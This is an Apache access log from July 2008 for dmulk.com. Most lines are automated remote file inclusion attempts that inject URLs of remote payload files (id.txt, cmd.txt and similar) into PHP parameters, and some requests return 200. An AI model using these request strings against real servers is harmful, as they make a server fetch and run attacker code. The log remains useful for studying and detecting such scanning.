206.117.237.200 - - [29/Jul/2008:11:22:57 -0700] "GET //playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:23:28 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:23:29 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:23:46 -0700] "GET /logs/access.log//join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:23:46 -0700] "GET //join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:23:46 -0700] "GET /logs//join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:23:48 -0700] "GET /logs/access.log//join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:23:49 -0700] "GET //join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:23:49 -0700] "GET /logs//join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:23:55 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:24:26 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:24:27 -0700] "GET /logs/access_080225.log//modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:24:27 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:24:40 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:24:47 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:24:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:11:24:51 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:25:12 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:25:21 -0700] "GET /logs//postscript.php?p_mode=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:25:21 -0700] "GET //postscript.php?p_mode=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:25:40 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:25:43 -0700] "GET /logs/access_080128.log//modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:11:25:45 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:25:48 -0700] "GET /?show=gallery&pageid=17&nggpage=2 HTTP/1.0" 200 54372 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:11:25:58 -0700] "GET /logs/access_080326.log/errors.php?error=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:26:24 -0700] "GET //join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:26:37 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [29/Jul/2008:11:26:44 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/feed/ HTTP/1.0" 200 677 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:27:01 -0700] "GET //join.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:27:11 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/?D=A HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:11:27:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:11:27:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:11:27:13 -0700] "GET /logs/access_080315.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:27:31 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/?D=A HTTP/1.0" 200 8649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:11:27:52 -0700] "GET /logs/access.log/index.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:11:27:53 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 200 18403 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:11:27:55 -0700] "GET /logs/access.log/index.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:11:27:56 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 200 18387 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:11:28:01 -0700] "GET /logs/access_080329.log/components/com_content/errors.php?error=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:28:02 -0700] "GET /bikes/dteel/2008_07_05/?M=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:11:28:03 -0700] "GET /components/com_content/errors.php?error=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:11:28:05 -0700] "GET /logs/components/com_content/errors.php?error=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:28:06 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:28:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:28:16 -0700] "GET /logs/access_080313.log%20/?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:28:50 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:28:51 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
82.224.74.43 - - [29/Jul/2008:11:28:59 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:29:02 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:29:02 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:29:03 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:11:29:03 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:29:40 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:29:40 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/?S=A HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:29:40 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:29:40 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:29:40 -0700] "GET /logs/access.log/v_all/v_2006_all/b/c//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:29:41 -0700] "GET /v_all/v_2006_all/b/c//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:29:41 -0700] "GET /logs/v_all/v_2006_all/b/c//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:30:04 -0700] "GET /logs/access_080326.log/errors.php?error=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.220.147 - - [29/Jul/2008:11:30:52 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.220.147 - - [29/Jul/2008:11:30:52 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.220.147 - - [29/Jul/2008:11:30:52 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.220.147 - - [29/Jul/2008:11:30:54 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:30:58 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:30:59 -0700] "GET //index.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 200 18421 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:30:59 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:31:10 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:31:13 -0700] "GET /?sourcedir=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 200 18393 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:31:14 -0700] "GET /logs/?sourcedir=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:31:55 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/?S=D HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.9.124.118 - - [29/Jul/2008:11:32:01 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.9.124.118 - - [29/Jul/2008:11:32:01 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.9.124.118 - - [29/Jul/2008:11:32:01 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.9.124.118 - - [29/Jul/2008:11:32:05 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:11:32:14 -0700] "GET /logs/access_080218.log/components/com_content/errors.php?error=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:32:44 -0700] "GET /logs/access.log/undefined/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:32:44 -0700] "GET /undefined/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:32:44 -0700] "GET /logs/undefined/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:33:06 -0700] "GET /logs/?sourcedir=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:33:08 -0700] "GET /?sourcedir=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 200 18377 "-" "libwww-perl/5.69" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:33:21 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:33:21 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:33:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 200 18421 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.41 - - [29/Jul/2008:11:33:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.41 - - [29/Jul/2008:11:33:49 -0700] "GET /logs/access_080218.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:11:34:08 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:11:34:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:34:52 -0700] "GET /bikes/dteel/2008_07_20/?N=A HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:34:55 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.230.220.147 - - [29/Jul/2008:11:35:01 -0700] "GET /logs/access_080329.log%20//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:35:02 -0700] "GET /logs/access.log/v_all/v_2006_all/b/c//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:35:02 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:35:02 -0700] "GET /v_all/v_2006_all/b/c//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:35:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:35:03 -0700] "GET /logs/v_all/v_2006_all/b/c//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:35:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:35:35 -0700] "GET /?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 200 18425 "-" "libwww-perl/5.806" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:35:42 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:35:44 -0700] "GET /logs/access_080315.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:35:44 -0700] "GET /errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:35:45 -0700] "GET /include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:35:45 -0700] "GET /logs/access_080103.log/include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:35:45 -0700] "GET /logs/include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:35:46 -0700] "GET /logs/access_080128.log/include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:36:01 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:36:03 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18353 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:36:08 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:36:10 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:36:25 -0700] "GET /logs/access_080315.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:36:25 -0700] "GET /errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:36:26 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:36:26 -0700] "GET /logs/access_080207.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:36:27 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:36:29 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18353 "-" "libwww-perl/5.810" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:36:31 -0700] "GET /logs/access.log/?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:36:32 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:36:33 -0700] "GET /logs/access_080313.log//claroline/tracking/userLog.php?rootSys=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:36:33 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:36:34 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:36:38 -0700] "GET /logs/access_080328.log//playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:36:38 -0700] "GET //playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
